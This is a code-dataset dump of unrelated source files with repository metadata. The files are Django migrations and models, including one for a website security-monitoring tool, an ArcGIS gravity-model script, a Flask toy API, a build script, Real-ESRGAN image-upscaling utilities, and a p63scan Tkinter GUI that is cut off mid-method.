('paths_count', models.IntegerField(default=0)),
('server_configs_count', models.IntegerField(default=0)),
('db_attack_count', models.IntegerField(default=0)),
('vulns_count', models.IntegerField(default=0)),
('high_count', models.IntegerField(default=0)),
('medium_count', models.IntegerField(default=0)),
('low_count', models.IntegerField(default=0)),
('info_count', models.IntegerField(default=0)),
('critical_count', models.IntegerField(default=0)),
],
options={
'db_table': 'host_statistics',
},
),
migrations.AddField(
model_name='websitetechnologiesmodel',
name='website',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='technologies', to='agents.HostsModel'),
),
migrations.AddField(
model_name='websitesubdomainsmodel',
name='website',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='subdomains', to='agents.HostsModel'),
),
migrations.AddField(
model_name='websitesecurityalertmodel',
name='host',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='msecurities', to='agents.HostsModel'),
),
migrations.AddField(
model_name='websitephishingdomaindetectmodel',
name='website',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='phishing', to='agents.HostsModel'),
),
migrations.AlterUniqueTogether(
name='websitemonitorurl',
unique_together=set([('url', 'path')]),
),
migrations.AddField(
model_name='websitemonitorstatusmodel',
name='website',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='mstatus', to='agents.HostsModel'),
),
migrations.AddField(
model_name='websitemonitorcontentmodel',
name='url_monitor',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='mcontents', to='agents.WebsiteMonitorUrl'),
),
migrations.AddField(
model_name='websitegooglehackingdetectmodel',
name='website',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ghdb', to='agents.HostsModel'),
),
migrations.AddField(
model_name='websitedatabasesmodel',
name='website',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='database', to='agents.HostsModel'),
),
migrations.AddField(
model_name='websitecontentmodel',
name='url_monitor',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='contents', to='agents.WebsiteMonitorUrl'),
),
migrations.AddField(
model_name='websiteblacklistcheckingmodel',
name='website',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='blacklist', to='agents.HostsModel'),
),
migrations.AddField(
model_name='serverconfigurationsmodel',
name='website',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='config_vulns', to='agents.HostsModel'),
),
]
| [
"[email protected]"
] | |
848cbab84018f841b970a1feb2b51d070c619871 | 2afc3ec1dae42403c2b208a21045e402636ca336 | /models.py | 28fa465795448218958b3af0e1a68d65f42181c9 | [] | no_license | Jagadishbommareddy/myapp | 6a5227f33ff5093eaf38f93ce9d69341e9ae6024 | 972b245c0fd33a4242ba17d3562f3e30acb20771 | refs/heads/master | 2021-01-22T13:52:49.093137 | 2017-08-18T09:14:59 | 2017-08-18T09:14:59 | 100,020,240 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,100 | py | from django.db import models
from .validators import *
class ContactInfo(models.Model):
mobile_no = models.CharField(max_length=15,validators=[validate_mobile_no])
phone_no = models.CharField(max_length=15, validators=[validate_phone_no])
email_id = models.EmailField(max_length=50)
class Address(models.Model):
address1 = models.CharField(max_length=50)
address2 = models.CharField(max_length=50)
city = models.CharField(max_length=20, validators=[validate_city])
state = models.CharField(max_length=20, validators=[validate_state])
landmark = models.CharField(max_length=50, validators=[validate_landmark])
pincode = models.CharField(max_length=10, validators=[validate_pincode])
class Customer(ContactInfo):
cuid = models.AutoField(primary_key=True)
first_name = models.CharField(max_length=15, validators=[validate_first_name])
last_name = models.CharField(max_length=15, validators=[validate_last_name])
age = models.CharField(max_length=2, validators=[validate_age])
Addresses = models.ManyToManyField("Address")
| [
"[email protected]"
] | |
e4eee8eb36da949a57ccfad7303d36932864ac6a | 496419c3802640fda626241b313d15499747c451 | /model_gravity_interactions.py | de84416634f6bd5a2ac930e9fbbc68dea580a9ac | [
"MIT"
] | permissive | simberaj/interactions | edf37bdf889f80e49032284621a2f0e38be99af8 | 8c7a29e97bc8f8d49901f6bdc406471f940c494e | refs/heads/master | 2021-01-17T13:13:14.414343 | 2016-05-28T12:13:29 | 2016-05-28T12:13:29 | 42,062,951 | 1 | 0 | null | 2015-09-22T14:24:35 | 2015-09-07T16:16:49 | Python | UTF-8 | Python | false | false | 2,739 | py | import arcpy, common, modeling, loaders
REPORT_TEMPLATE = u'''Interaction gravity modelling analysis
Input interactions: %s
Interaction selection query: %s
Origin mass field (m1): %s
Destination mass field (m2): %s
Interaction real strength field: %s
Interaction length field (d): %s
Output model strength field: %s
Optimization method used: %s
Interactions found: %i
Using gravity model in form G*m1*m2*d^(-B)
MODEL OUTPUT
Calculated parameters calibrated on real interactions
B parameter value: %g
G parameter value: %g
STATISTICAL ANALYSIS
'''
with common.runtool(9) as parameters:
interactions, selQuery, massFromFld, massToFld, interactFld, lengthFld, optimizationMethod, outputFld, reportFileName = parameters
## ASSEMBLE INPUT
common.progress('counting interactions')
count = common.count(interactions)
if count == 0:
raise ValueError, 'no interactions found'
common.message('Found ' + str(count) + ' interactions.')
common.progress('loading interactions')
modelInters = loaders.BasicReader(interactions, {'strength' : interactFld, 'distance' : lengthFld, 'massFrom' : massFromFld, 'massTo' : massToFld}, targetClass=modeling.GravityInteraction, where=selQuery).read()
# rows = arcpy.SearchCursor(interactions, selQuery)
# modelInters = []
# for row in rows:
# try:
# modelInters.append(GravityInteraction(row.getValue(interactFld), row.getValue(lengthFld), row.getValue(massFromFld), row.getValue(massToFld)))
# except ValueError:
# pass # neplatna interakce
## OPTIMALIZE
common.progress('creating gravity model')
opt = modeling.GravityOptimizer(modelInters)
common.progress('optimizing model parameters')
opt.optimize(optimizationMethod)
common.message('Model parameters found:')
common.message('B parameter value: ' + str(opt.getB()))
common.message('G parameter value: ' + str(opt.getG()))
common.progress('calculating model interactions')
modelStrengths = opt.theoreticalInteractions()
common.progress('calculating residuals')
report = opt.report(modelStrengths)
common.message('\nStatistical report\n\n' + report)
common.progress('saving model interactions')
loaders.SequentialUpdater(interactions, {'s' : outputFld}, where=selQuery).update([{'s' : st} for st in modelStrengths])
# rows = arcpy.UpdateCursor(interactions, selQuery)
# i = 0
# for row in rows:
# row.setValue(outputFld, modelStrengths[i])
# rows.updateRow(row)
# i += 1
if reportFileName:
common.progress('creating report')
out = (REPORT_TEMPLATE % (interactions, selQuery, massFromFld, massToFld, interactFld, lengthFld, outputFld, optimizationMethod, count, opt.getB(), opt.getG())) + report
opt.writeReport(out, reportFileName)
| [
"[email protected]"
] | |
59dc9eb4875328342d35aa350be38f2fd480157f | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02988/s646336284.py | b26f4503b3a987d425115b8af58ec10880ae0e19 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 196 | py | n = int(input())
P = [int(i) for i in input().split()]
ans = 0
for i in range(1, n-1):
if P[i-1] < P[i] < P[i+1]:
ans += 1
elif P[i-1] > P[i] > P[i+1]:
ans += 1
print(ans) | [
"[email protected]"
] | |
3b3ca2bace9cc78bd6f70523ff06faf3a1e3b10e | 8d1264d9257eba418f92dbbbc8aac6773c4ec715 | /core/signals/handlers.py | fe560bf24bf5e2578f83b7ab830653fd8a1cdd46 | [
"MIT"
] | permissive | aldwyn/effigia | 5f3e9e37eb7d169983034b61c7455baedc2d8817 | eb456656949bf68934530bbec9c15ebc6d0236b8 | refs/heads/main | 2023-02-18T00:09:53.905711 | 2021-06-10T22:04:51 | 2021-06-10T22:04:51 | 96,387,903 | 1 | 1 | MIT | 2023-02-15T20:04:00 | 2017-07-06T04:21:09 | HTML | UTF-8 | Python | false | false | 1,259 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import factory
from django.contrib.auth import get_user_model
from django.core.files.base import ContentFile
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.utils.text import slugify
from core.models import Category
from apps.accounts.models import UserProfile
from apps.galleries.models import Gallery
@receiver(post_save, sender=get_user_model())
def user_created(sender, instance, created, **kwargs):
if created and not instance.is_superuser:
UserProfile.objects.create(user=instance)
Gallery.objects.create(
name='Default',
is_default=True,
slug=slugify('default-gallery-by-%s' % instance),
created_by=instance,
description=('This is the gallery intended for your default portfolio storage. '
'Upload portfolios here to familiarize how Effigia galleries work.'),
category=Category.objects.get(name='Uncategorized'),
cover_image=ContentFile(
factory.django.ImageField()._make_data(
{'width': 1024, 'height': 768}
), 'default-gallery-cover.jpg'
))
| [
"[email protected]"
] | |
69758bba6726950a002212f930181c065e9e2d13 | 175e4e031471e5cdbc9bcaee2df10f5ec44871d3 | /LESSON2b/.history/test/webapitest/app_20200606195359.py | 714e72278231784e6b0e68430eaf0ccb9e8fd6b3 | [] | no_license | hiyacins/uma_study | c329d29a9c3899ab4feca21b9c47ef546b69b0bd | 067e66f258a0c89f7670c645dd7c40feee8536fa | refs/heads/master | 2023-01-23T06:40:12.435047 | 2020-06-17T15:59:34 | 2020-06-17T15:59:34 | 239,077,726 | 0 | 0 | null | 2023-01-06T08:36:26 | 2020-02-08T05:56:52 | Python | UTF-8 | Python | false | false | 714 | py | from flask import Flask, jsonify, request
import json
app = Flask(__name__)
number = []
# クライアント側からPostされてくる
@app.route('/incomes')
def get_incomes():
return jsonify(number)
# postされてきた情報を追加する。No Contentの場合のみ返す。
@app.route('/incomes', methods=['POST'])
def add_income():
number.append(request.get_json())
return '', 204
# jsonで取得したデータのvalueを足し算してクライアントに返す。
@app.route('/')
def calc_income():
print("きたよ")
x = json.load(request.get_json())
print(x)
z = int(x[0]) + int(x[1])
print(z)
return jsonify(z)
if __name__ == '__main__':
app.run()
| [
"[email protected]"
] | |
d544c2e7c9d241f40063ad8f91244d2f6b777aee | e7e74b72d5367ad03adcf20b3220620baddcc113 | /gore/signals.py | d6cca88cbbe184fe91d588a1ddd42b337042da80 | [
"MIT"
] | permissive | akx/gentry | be044a51d0b4d3dd875e320c5ecc3c02c0bc249c | 5a550e34ced37f8f83a10001a3ef0b1480983781 | refs/heads/master | 2023-02-21T21:42:55.205987 | 2022-07-05T22:34:27 | 2022-07-21T11:46:46 | 98,209,171 | 4 | 1 | MIT | 2023-02-15T20:41:40 | 2017-07-24T16:02:32 | Python | UTF-8 | Python | false | false | 62 | py | from django.dispatch import Signal
event_received = Signal()
| [
"[email protected]"
] | |
779cddc46f1d979f1b14262ace1f13380aa72d7e | 88ae8695987ada722184307301e221e1ba3cc2fa | /native_client/tests/unittests/shared/platform/build.scons | bfeb276a5229c844b09fb3c0810f6fc5f369a80a | [
"BSD-3-Clause",
"Zlib",
"Classpath-exception-2.0",
"BSD-Source-Code",
"LZMA-exception",
"LicenseRef-scancode-unicode",
"LGPL-3.0-only",
"LGPL-2.0-or-later",
"LicenseRef-scancode-philippe-de-muyter",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-intel-osl-1993",
"HPND-sell-variant",
"ICU",
"LicenseRef-scancode-protobuf",
"bzip2-1.0.6",
"Spencer-94",
"NCSA",
"LicenseRef-scancode-nilsson-historical",
"CC0-1.0",
"LicenseRef-scancode-proprietary-license",
"LGPL-2.1-only",
"LicenseRef-scancode-other-copyleft",
"GPL-2.0-or-later",
"NTP",
"GPL-2.0-only",
"LicenseRef-scancode-other-permissive",
"GPL-3.0-only",
"GFDL-1.1-only",
"W3C",
"LicenseRef-scancode-python-cwi",
"GCC-exception-3.1",
"BSL-1.0",
"Python-2.0",
"GPL-1.0-or-later",
"LGPL-2.1-or-later",
"LicenseRef-scancode-unknown-license-reference",
"CPL-1.0",
"GFDL-1.1-or-later",
"W3C-19980720",
"LGPL-2.0-only",
"LicenseRef-scancode-amd-historical",
"LicenseRef-scancode-ietf",
"SAX-PD",
"LicenseRef-scancode-x11-hanson",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause",
"dtoa",
"MIT",
"LicenseRef-scancode-public-domain-disclaimer",
"PSF-2.0",
"LicenseRef-scancode-newlib-historical",
"LicenseRef-scancode-generic-exception",
"SMLNJ",
"HP-1986",
"LicenseRef-scancode-free-unknown",
"SunPro",
"MPL-1.1"
] | permissive | iridium-browser/iridium-browser | 71d9c5ff76e014e6900b825f67389ab0ccd01329 | 5ee297f53dc7f8e70183031cff62f37b0f19d25f | refs/heads/master | 2023-08-03T16:44:16.844552 | 2023-07-20T15:17:00 | 2023-07-23T16:09:30 | 220,016,632 | 341 | 40 | BSD-3-Clause | 2021-08-13T13:54:45 | 2019-11-06T14:32:31 | null | UTF-8 | Python | false | false | 959 | scons | # -*- python -*-
# Copyright 2008 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
Import('env')
nacl_thread_create_joinable_test_exe = env.ComponentProgram(
'nacl_thread_create_joinable_test',
'nacl_thread_create_joinable_test.c',
EXTRA_LIBS=['platform',
'gio'])
node = env.CommandTest(
'nacl_thread_create_joinable_test.out',
command=[nacl_thread_create_joinable_test_exe])
env.AddNodeToTestSuite(node,
['small_tests'],
'run_nacl_thread_create_joinable_test')
atomic_ops_test_exe = env.ComponentProgram(
'atomic_ops_test',
'atomic_ops_test.c',
EXTRA_LIBS=['platform', 'gio'])
node = env.CommandTest(
'atomic_ops_test.out',
command=[atomic_ops_test_exe, '25'],
size='medium')
env.AddNodeToTestSuite(node, ['medium_tests'], 'run_atomic_ops_test')
| [
"[email protected]"
] | |
1559621c54b1ff6ac69648ec2eb3bf4ef28bfa19 | c9a8bbc9068983d0fdeec0591baada54097199a9 | /realesrgan/utils.py | 06b2261df8e9a441ef8dea2fde9f321b133d6c5e | [
"BSD-3-Clause",
"Python-2.0"
] | permissive | BookerDeWitt/Real-ESRGAN | 041188784c8e1f842a443229643cb3065edc2272 | 5745599813f64c60b98048251ac421f199b4c034 | refs/heads/master | 2023-07-07T13:19:32.780848 | 2021-08-08T08:41:50 | 2021-08-08T08:41:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,470 | py | import cv2
import math
import numpy as np
import os
import torch
from basicsr.archs.rrdbnet_arch import RRDBNet
from torch.hub import download_url_to_file, get_dir
from torch.nn import functional as F
from urllib.parse import urlparse
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
class RealESRGANer():
def __init__(self, scale, model_path, tile=0, tile_pad=10, pre_pad=10, half=False):
self.scale = scale
self.tile_size = tile
self.tile_pad = tile_pad
self.pre_pad = pre_pad
self.mod_scale = None
self.half = half
# initialize model
self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=scale)
if model_path.startswith('https://'):
model_path = load_file_from_url(
url=model_path, model_dir='realesrgan/weights', progress=True, file_name=None)
loadnet = torch.load(model_path)
if 'params_ema' in loadnet:
keyname = 'params_ema'
else:
keyname = 'params'
model.load_state_dict(loadnet[keyname], strict=True)
model.eval()
self.model = model.to(self.device)
if self.half:
self.model = self.model.half()
def pre_process(self, img):
img = torch.from_numpy(np.transpose(img, (2, 0, 1))).float()
self.img = img.unsqueeze(0).to(self.device)
if self.half:
self.img = self.img.half()
# pre_pad
if self.pre_pad != 0:
self.img = F.pad(self.img, (0, self.pre_pad, 0, self.pre_pad), 'reflect')
# mod pad
if self.scale == 2:
self.mod_scale = 2
elif self.scale == 1:
self.mod_scale = 4
if self.mod_scale is not None:
self.mod_pad_h, self.mod_pad_w = 0, 0
_, _, h, w = self.img.size()
if (h % self.mod_scale != 0):
self.mod_pad_h = (self.mod_scale - h % self.mod_scale)
if (w % self.mod_scale != 0):
self.mod_pad_w = (self.mod_scale - w % self.mod_scale)
self.img = F.pad(self.img, (0, self.mod_pad_w, 0, self.mod_pad_h), 'reflect')
def process(self):
try:
# inference
with torch.no_grad():
self.output = self.model(self.img)
except Exception as error:
print('Error', error)
def tile_process(self):
"""Modified from: https://github.com/ata4/esrgan-launcher
"""
batch, channel, height, width = self.img.shape
output_height = height * self.scale
output_width = width * self.scale
output_shape = (batch, channel, output_height, output_width)
# start with black image
self.output = self.img.new_zeros(output_shape)
tiles_x = math.ceil(width / self.tile_size)
tiles_y = math.ceil(height / self.tile_size)
# loop over all tiles
for y in range(tiles_y):
for x in range(tiles_x):
# extract tile from input image
ofs_x = x * self.tile_size
ofs_y = y * self.tile_size
# input tile area on total image
input_start_x = ofs_x
input_end_x = min(ofs_x + self.tile_size, width)
input_start_y = ofs_y
input_end_y = min(ofs_y + self.tile_size, height)
# input tile area on total image with padding
input_start_x_pad = max(input_start_x - self.tile_pad, 0)
input_end_x_pad = min(input_end_x + self.tile_pad, width)
input_start_y_pad = max(input_start_y - self.tile_pad, 0)
input_end_y_pad = min(input_end_y + self.tile_pad, height)
# input tile dimensions
input_tile_width = input_end_x - input_start_x
input_tile_height = input_end_y - input_start_y
tile_idx = y * tiles_x + x + 1
input_tile = self.img[:, :, input_start_y_pad:input_end_y_pad, input_start_x_pad:input_end_x_pad]
# upscale tile
try:
with torch.no_grad():
output_tile = self.model(input_tile)
except Exception as error:
print('Error', error)
print(f'\tTile {tile_idx}/{tiles_x * tiles_y}')
# output tile area on total image
output_start_x = input_start_x * self.scale
output_end_x = input_end_x * self.scale
output_start_y = input_start_y * self.scale
output_end_y = input_end_y * self.scale
# output tile area without padding
output_start_x_tile = (input_start_x - input_start_x_pad) * self.scale
output_end_x_tile = output_start_x_tile + input_tile_width * self.scale
output_start_y_tile = (input_start_y - input_start_y_pad) * self.scale
output_end_y_tile = output_start_y_tile + input_tile_height * self.scale
# put tile into output image
self.output[:, :, output_start_y:output_end_y,
output_start_x:output_end_x] = output_tile[:, :, output_start_y_tile:output_end_y_tile,
output_start_x_tile:output_end_x_tile]
def post_process(self):
# remove extra pad
if self.mod_scale is not None:
_, _, h, w = self.output.size()
self.output = self.output[:, :, 0:h - self.mod_pad_h * self.scale, 0:w - self.mod_pad_w * self.scale]
# remove prepad
if self.pre_pad != 0:
_, _, h, w = self.output.size()
self.output = self.output[:, :, 0:h - self.pre_pad * self.scale, 0:w - self.pre_pad * self.scale]
return self.output
def enhance(self, img, tile=False, alpha_upsampler='realesrgan'):
# img: numpy
img = img.astype(np.float32)
if np.max(img) > 255: # 16-bit image
max_range = 65535
print('\tInput is a 16-bit image')
else:
max_range = 255
img = img / max_range
if len(img.shape) == 2: # gray image
img_mode = 'L'
img = cv2.cvtColor(img, cv2.COLOR_GRAY2RGB)
elif img.shape[2] == 4: # RGBA image with alpha channel
img_mode = 'RGBA'
alpha = img[:, :, 3]
img = img[:, :, 0:3]
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
if alpha_upsampler == 'realesrgan':
alpha = cv2.cvtColor(alpha, cv2.COLOR_GRAY2RGB)
else:
img_mode = 'RGB'
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# ------------------- process image (without the alpha channel) ------------------- #
self.pre_process(img)
if self.tile_size > 0:
self.tile_process()
else:
self.process()
output_img = self.post_process()
output_img = output_img.data.squeeze().float().cpu().clamp_(0, 1).numpy()
output_img = np.transpose(output_img[[2, 1, 0], :, :], (1, 2, 0))
if img_mode == 'L':
output_img = cv2.cvtColor(output_img, cv2.COLOR_BGR2GRAY)
# ------------------- process the alpha channel if necessary ------------------- #
if img_mode == 'RGBA':
if alpha_upsampler == 'realesrgan':
self.pre_process(alpha)
if self.tile_size > 0:
self.tile_process()
else:
self.process()
output_alpha = self.post_process()
output_alpha = output_alpha.data.squeeze().float().cpu().clamp_(0, 1).numpy()
output_alpha = np.transpose(output_alpha[[2, 1, 0], :, :], (1, 2, 0))
output_alpha = cv2.cvtColor(output_alpha, cv2.COLOR_BGR2GRAY)
else:
h, w = alpha.shape[0:2]
output_alpha = cv2.resize(alpha, (w * self.scale, h * self.scale), interpolation=cv2.INTER_LINEAR)
# merge the alpha channel
output_img = cv2.cvtColor(output_img, cv2.COLOR_BGR2BGRA)
output_img[:, :, 3] = output_alpha
# ------------------------------ return ------------------------------ #
if max_range == 65535: # 16-bit image
output = (output_img * 65535.0).round().astype(np.uint16)
else:
output = (output_img * 255.0).round().astype(np.uint8)
return output, img_mode
def load_file_from_url(url, model_dir=None, progress=True, file_name=None):
"""Ref:https://github.com/1adrianb/face-alignment/blob/master/face_alignment/utils.py
"""
if model_dir is None:
hub_dir = get_dir()
model_dir = os.path.join(hub_dir, 'checkpoints')
os.makedirs(os.path.join(ROOT_DIR, model_dir), exist_ok=True)
parts = urlparse(url)
filename = os.path.basename(parts.path)
if file_name is not None:
filename = file_name
cached_file = os.path.abspath(os.path.join(ROOT_DIR, model_dir, filename))
if not os.path.exists(cached_file):
print(f'Downloading: "{url}" to {cached_file}\n')
download_url_to_file(url, cached_file, hash_prefix=None, progress=progress)
return cached_file
| [
"[email protected]"
] | |
5d3905192683a5c50a7325311d5ace07612a462d | 14be8bcd7e66aad90b98d7c76a78fdb94c7c4f65 | /l06/class6.py | 7bbaa747c2aab0de8091ab7eb6f5675803a36373 | [] | no_license | alexbyz/HW070172 | f6231d7ccd0fb06a88db9bd6b0c718ed70ce62a2 | e0e4946f82ba71b4d3860c570fadb9cd96a6c9a1 | refs/heads/main | 2023-03-03T06:16:17.630740 | 2021-02-09T09:55:04 | 2021-02-09T09:55:04 | 305,626,086 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,304 | py | import regex
recordIdealtype = {
"recodType": "recordType",
"citationKey": "citationKey",
"title": "title",
"author": "author",
"date": "date",
"location": "location"
}
def readFile(): #reads in the file
infile = input("inputfile: ")
infile = open(infile, "r", encoding="UTF-8")
data ="" #string to read the file into
#for line in infile:
# data = data + line
date = infile.read()
return data
def getRecords(inString): #splits the long string along '\n@'
return inString.split("\n@")
def main():
data = readFile()
records = getRecords(data)
    for rawRecord in records[1:]: # loop through the records, skipping anything before the first '@'
        entry = rawRecord.split('\n')
        firstEntry = entry[0].split('{')
        record = {}
        record["recordType"] = firstEntry[0].strip()
        record["citationKey"] = firstEntry[1].strip().rstrip(',')
        for line in entry[1:]:
            if "=" not in line:
                continue
            key, value = line.split("=", 1)
            if key.strip() in recordIdealtype:
                record[key.strip()] = value.strip().strip('{},')
        print(record)
main() | [
"[email protected]"
] | |
054f36bcdf826e08a8f89aaa7f004b02e8e37953 | 5bb2bfb2b15d2fd1c481181e028445da9c999d4a | /scripts/p63scan_gui.py | ba238ab6d96117f0882f83b287f5a4ff7f570947 | [
"MIT"
] | permissive | Cesibarcaroli/p53scan | a482fe7a126b52468212f81834b30645af3d50d2 | d73230e108db36fbcb7bb478f0622fe10cddd9df | refs/heads/master | 2021-01-21T20:06:50.508594 | 2017-05-15T11:14:14 | 2017-05-15T11:14:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,315 | py | #!/usr/bin/env python
import sys
import string
import os
from Tkinter import *
import tkFileDialog
import tkSimpleDialog
import tkMessageBox
from PftScan.Fasta import Fasta
from PftScan.core import scan
# Constants
NAME = "p63scan"
VERSION = "1.05"
DESCRIPTION = """%s - Version %s
p63scan (http://www.ncmls.nl/bioinfo/p53scan/) is an algorithm to locate
p63 binding sites in DNA sequences. It is described in:
Smeenk L, van Heeringen SJ, Koeppel M, Driel MA, Bartels SJ, Akkers RC,
Denissov S, Stunnenberg HG, Lohrum M. Characterization of genome-wide
p53-binding sites upon stress response. Nucleic Acids Res. (2008) """ % (NAME, VERSION)
# Constants determining default values for p63scan
DEFAULT_MIN_SPACER = 0
DEFAULT_MAX_SPACER = 0
DEFAULT_NREPORT = 1
DEFAULT_CUTOFFS = [4.737]
PWM_LEFT = [
[0.282487110278,0.0977411337588,0.374860098537,0.244911657426],
[0.406620302733,0.0295237937609,0.440169814207,0.123686089299],
[2.23663409829e-07,0.968910115044,0.00626279913863,0.0248268621545],
[0.692909467314,0.116752523594,0.0733618220874,0.116976187004],
[0.296354241687,0.0185642866792,0.150973025298,0.534108446336],
[2.23663409829e-07,2.23663409829e-07,0.99999932901,2.23663409829e-07],
[0.103332719005,0.382911981291,0.00559180890914,0.508163490795],
[0.164392829888,0.439498823978,0.0883472705459,0.307761075588],
[0.160814215331,0.333258704309,0.202191946149,0.303735134211]
]
PWM_RIGHT = [
[0.309550382867,0.199731648641,0.329009099522,0.16170886897],
[0.307761075588,0.0885709339558,0.443748428765,0.159919561691],
[0.511742105353,0.00671012595829,0.380675347193,0.100872421496],
[2.23663409829e-07,0.99999932901,2.23663409829e-07,2.23663409829e-07],
[0.532990129286,0.151420352118,0.0172223062203,0.298367212376],
[0.116081533365,0.0740328123169,0.115857869955,0.694027784363],
[0.0259451792036,0.00648646254846,0.967568134585,2.23663409829e-07],
[0.123909752709,0.43659119965,0.029300130351,0.41019891729],
[0.237307101492,0.379109703324,0.0975174703489,0.286065724835],
[0.199284321821,0.302840480572,0.158801244642,0.339073952964]
]
class ScanDialog(tkSimpleDialog.Dialog):
def switch_default(self):
if self.default_switches[0]['state'] == DISABLED:
for entry in self.default_switches:
entry['state'] = NORMAL
if self.r.get() == 3:
self.cutoff_entry['state'] = NORMAL
else:
for entry in self.default_switches + self.entries:
entry['state'] = DISABLED
def cutoff_default(self):
self.cutoff_entry['state'] = NORMAL
self.cutoff_entry.delete(0,END)
self.cutoff_entry.insert(END, "Default")
self.cutoff_entry['state'] = DISABLED
def cutoff_none(self):
self.cutoff_entry['state'] = NORMAL
self.cutoff_entry.delete(0,END)
self.cutoff_entry.insert(END, "None")
self.cutoff_entry['state'] = DISABLED
def cutoff_on(self):
self.cutoff_entry['state'] = NORMAL
self.cutoff_entry.delete(0,END)
self.cutoff_entry.insert(END, "0")
def body(self, master):
self.scan_ok = False
boxes = [
("Minspacer:", 0, DEFAULT_MIN_SPACER, True),
("Maxspacer:", 1, DEFAULT_MAX_SPACER, True),
("Numreport:", 2, DEFAULT_NREPORT, True),
("Score cutoff:", 4, "Default", False),
]
self.entries = []
self.default_switches = []
for (label, r, val, ds) in boxes:
Label(master, text=label).grid(row=r)
entry = Entry(master)
entry.grid(row=r, column=1, columnspan=3, sticky=W)
entry.insert(END, val)
self.entries.append(entry)
if ds:
self.default_switches.append(entry)
self.cutoff_entry = self.entries[-1]
Label(master).grid(row=3)
Label(master).grid(row=6)
self.r = IntVar()
self.r.set(1)
for (label, v, col, function) in [("Default", 1, 0, self.cutoff_default), ("None", 2, 1, self.cutoff_none),("Cutoff", 3, 2, self.cutoff_on)]:
r = Radiobutton(master, text=label, variable=self.r, value=v, command=function)
r.grid(row=5, column=col, sticky=W)
self.default_switches.append(r)
for entry in self.entries + self.default_switches:
entry["state"] = DISABLED
self.cb = Checkbutton(master, text="Default Settings", command=self.switch_default)
self.cb.grid(row=7, columnspan=4, sticky=W)
self.cb.select()
return self.cb # initial focus
def apply(self):
pass
def validate(self):
try:
self.scan_ok = True
self.min_spacer = string.atoi(self.entries[0].get())
self.max_spacer = string.atoi(self.entries[1].get())
self.nreport = string.atoi(self.entries[2].get())
self.defaults = True
self.cutoff = None
if self.r.get() > 1:
self.defaults = False
if self.r.get() == 3:
self.cutoff = string.atof(self.entries[3].get())
return 1
except:
tkMessageBox.showwarning("Bad input", "Illegal values, please try again")
return 0
class MultiListbox(Frame):
# MultiListbox Tkinter widget code by Brent Burley
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/52266
# SortableTable widget additions by Rick Lawson
# http://tkinter.unpythonic.net/wiki/SortableTable
def __init__(self, master, lists):
Frame.__init__(self, master)
self.lists = []
self.colmapping={}
self.origData = None
for l,w in lists:
frame = Frame(self); frame.pack(side=LEFT, expand=YES, fill=BOTH)
b = Button(frame, text=l, borderwidth=1, relief=RAISED)
b.pack(fill=X)
b.bind('<Button-1>', self._sort)
self.colmapping[b]=(len(self.lists),1)
lb = Listbox(frame, width=w, borderwidth=0, selectborderwidth=0,
relief=FLAT, exportselection=FALSE)
lb.pack(expand=YES, fill=BOTH)
self.lists.append(lb)
lb.bind('<B1-Motion>', lambda e, s=self: s._select(e.y))
lb.bind('<Button-1>', lambda e, s=self: s._select(e.y))
lb.bind('<Leave>', lambda e: 'break')
lb.bind('<B2-Motion>', lambda e, s=self: s._b2motion(e.x, e.y))
lb.bind('<Button-2>', lambda e, s=self: s._button2(e.x, e.y))
frame = Frame(self); frame.pack(side=LEFT, fill=Y)
Label(frame, borderwidth=1, relief=RAISED).pack(fill=X)
sb = Scrollbar(frame, orient=VERTICAL, command=self._scroll)
sb.pack(expand=YES, fill=Y)
self.lists[0]['yscrollcommand']=sb.set
def _select(self, y):
row = self.lists[0].nearest(y)
self.selection_clear(0, END)
self.selection_set(row)
return 'break'
def _button2(self, x, y):
for l in self.lists: l.scan_mark(x, y)
return 'break'
def _b2motion(self, x, y):
for l in self.lists: l.scan_dragto(x, y)
return 'break'
def _scroll(self, *args):
for l in self.lists:
apply(l.yview, args)
def curselection(self):
return self.lists[0].curselection()
def delete(self, first, last=None):
for l in self.lists:
l.delete(first, last)
def get(self, first, last=None):
result = []
for l in self.lists:
result.append(l.get(first,last))
if last:
if last - first == 0:
return [result]
else:
return apply(map, [None] + result)
return [result]
def index(self, index):
self.lists[0].index(index)
def insert(self, index, *elements):
for e in elements:
i = 0
for l in self.lists:
l.insert(index, e[i])
i = i + 1
def size(self):
return self.lists[0].size()
def see(self, index):
for l in self.lists:
l.see(index)
def selection_anchor(self, index):
for l in self.lists:
l.selection_anchor(index)
def selection_clear(self, first, last=None):
